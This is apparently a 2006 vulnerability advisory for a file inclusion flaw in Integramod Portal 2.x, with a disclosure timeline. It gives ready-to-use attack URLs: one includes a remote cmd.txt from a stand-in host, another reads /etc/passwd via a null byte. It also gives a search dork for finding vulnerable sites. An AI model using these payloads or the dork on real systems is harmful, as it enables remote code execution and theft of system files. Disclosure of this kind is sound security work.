--Security Report-- Advisory: Integramod Portal <= 2.x File Inclusion Vulnerability --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 24/08/06 03:00 AM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx@xxxxxxxxxx Web: http://www.nukedx.com } --- Vendor: Integramod (http://www.integramod.com) Version: 2.x and prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to Integramod.Variable phpbb_root_path did not sanitized properly before using it on includes/functions_portal.php so remote attacker can include internal and external files to VistaBB For including internal files magic_quotes_gpc must be off on server settings because remote attacker needs to use null char at the end of filename. Eg: /etc/passwd%00 Level: Highly Critical --- How&Example: GET -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=[FILE] EXAMPLE -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt? EXAMPLE -> http://[site]/[integramodpath]/includes/functions_portal.php?phpbb_root_path=/etc/passwd%00 <- mq off --- Timeline: * 24/08/2006: Vulnerability found. * 24/08/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=47 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=47 --- Dorks: "Powered by Integramod"